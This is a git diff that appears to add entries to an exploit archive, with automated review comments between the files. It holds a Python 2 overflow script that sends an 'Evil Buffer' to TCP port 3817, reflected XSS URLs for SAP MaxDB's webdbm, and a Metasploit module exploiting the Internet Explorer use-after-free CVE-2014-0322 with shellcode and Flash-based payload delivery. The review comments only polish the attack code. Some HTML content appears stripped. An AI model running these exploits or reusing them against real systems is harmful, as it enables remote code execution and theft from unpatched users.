+"\x06\x10\x00\x44\x74\x62\x3a\x20\x43\x6f\x6e\x74\x65\x78\x74\x00\xd8\xc1\x08\x10\xb0\x03\x00\x00\xff\xff\x00\x00\x06\x10\x00\x00"+
+"\x80\xfa")
+
+Request2_1=("\x51\x84\x00\x00\x02\x02\x02\x32\x18\x00\x00\x00\xa4\x01\x00\x00"+
+"\x00\x00\x00\x00")
+
+Request2_2=("\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x4d\x4c\x4d\x4c\x4d\x44\x4f\x4c\x4f\x44\x4f\x44"+
+"\x49\x4c\x49\x44\x49\x4c\x43\x4c\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x01\x10\x00\x00\x1f\x93\xf0\x48\x67\x60\x1e\x00"+
+"\xd1\xc4\x4f\x00")
+
+if len(sys.argv) != 2:
+print "[x] Usage: IP"
+sys.exit
+hostname = sys.argv[1]
+buff3r = ("\x41"*77) + "\x44"*156 + ("\x43"*75) + "\x0d\xf0\x0d\xf0"
+
+logno = Request2_1 + buff3r + Request2_2
+
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+s.connect((hostname,3817))
+except socket.error, (value,msg):
+if s:
+s.close()
+print "[x] Error: %s.\n" % msg
+sys.exit(1)
+else:
+print "[x] Connected to: %s." % hostname
+
+print "[x] Sending initial request.."
+try:
+s.send(request1_1)
+except socket.error, (value,msg):
+if s:
+s.close()
+print "[x] Error: %s.\n" % msg
+sys.exit(1)
+else:
+print "[x] Sent!"
+
+print "[x] Sending Evil Buffer.."
+
+try:
+s.send(logno)
+except socket.error, (value,msg):
+if s:
+s.close()
+print "[x] Error: %s.\n" % msg
+sys.exit(1)
+else:
+print "[x] Sent!"
+
+print "[x] End of Demo exploit."
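Review bot: This file is added as `32832.c` but its content is Python 2 (`import socket`, `print "..."` statements, `except socket.error, (value,msg):`), so the `.c` extension is wrong and should be `.py`, with any index that references the path updated to match. In the usage check, `sys.exit` on the line after the usage message is a bare attribute reference rather than a call, so the script does not exit and instead fails on `sys.argv[1]` with an IndexError; it should be `sys.exit(1)`. As shown here the bodies of the `if`, `try`, `except` and `else` blocks carry no indentation; if that is not an extraction artefact the file is not valid Python at all, which is worth checking against the committed bytes.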
diff --git a/platforms/windows/remote/32851.html b/platforms/windows/remote/32851.html
new file mode 100755
index 000000000..044af63f9
--- /dev/null
+++ b/platforms/windows/remote/32851.html
@@ -0,0 +1,111 @@
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/32879.html b/platforms/windows/remote/32879.html
new file mode 100755
index 000000000..74826449e
--- /dev/null
+++ b/platforms/windows/remote/32879.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34319/info
+
+SAP MaxDB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=[XSS]
+http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&User=[XSS]
+http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS]
\ No newline at end of file
diff --git a/platforms/windows/remote/32904.rb b/platforms/windows/remote/32904.rb
new file mode 100755
index 000000000..561b3c5b9
--- /dev/null
+++ b/platforms/windows/remote/32904.rb
@@ -0,0 +1,200 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",
+ 'Description' => %q{
+ This module exploits an use after free condition on Internet Explorer as used in the wild
+ on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to
+ bypass ASLR and finally DEP.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability discovery and Exploit in the wild
+ 'Jean-Jamil Khalife', # Exploit
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2014-0322' ],
+ [ 'MSB', 'MS14-012' ],
+ [ 'BID', '65551' ],
+ [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],
+ [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]
+ ],
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Payload' =>
+ {
+ 'Space' => 960,
+ 'DisableNops' => true,
+ 'PrependEncoder' => stack_adjust
+ },
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => Msf::OperatingSystems::WINDOWS,
+ :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN,
+ :ua_name => Msf::HttpClients::IE,
+ :ua_ver => '10.0',
+ :mshtml_build => lambda { |ver| ver.to_i < 16843 },
+ :flash => /^12\./
+ },
+ 'DefaultOptions' =>
+ {
+ 'InitialAutoRunScript' => 'migrate -f',
+ 'Retries' => false
+ },
+ 'Targets' =>
+ [
+ [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 13 2014",
+ 'DefaultTarget' => 0))
+
+ end
+
+ def stack_adjust
+ adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
+ adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
+ adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
+ adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
+
+ adjust
+ end
+
+ def create_swf
+ path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0322", "AsXploit.swf" )
+ fd = ::File.open( path, "rb" )
+ swf = fd.read(fd.stat.size)
+ fd.close
+ return swf
+ end
+
+ def exploit
+ @swf = create_swf
+ super
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status("Sending SWF...")
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Sending HTML...")
+ send_exploit_html(cli, exploit_template(cli, target_info))
+ end
+
+ def exploit_template(cli, target_info)
+
+ flash_payload = ""
+ get_payload(cli,target_info).unpack("V*").each do |i|
+ flash_payload << "0x#{i.to_s(16)},"
+ end
+ flash_payload.gsub!(/,$/, "")
+
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+ end
+
+end
\ No newline at end of file
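Review bot: `create_swf` opens the SWF with `::File.open`, reads it and closes it by hand, so if `read` raises the handle is leaked and the explicit `fd.stat.size` read is unnecessary; the four lines collapse to `swf = ::File.binread(path)` (or the block form `::File.open(path, 'rb') { |f| f.read }`), which closes the file on every path. In `exploit_template`, the `each`/`<<`/`gsub!` sequence that builds `flash_payload` is a `map`/`join` in disguise: `flash_payload = get_payload(cli, target_info).unpack("V*").map { |i| "0x#{i.to_s(16)}" }.join(",")`. The `html_template` heredoc appears empty in this rendering, which looks like the HTML was stripped during extraction rather than an error in the commit, but it is worth confirming. The 'Description' text would read better as "a use-after-free condition" and the file lacks a trailing newline.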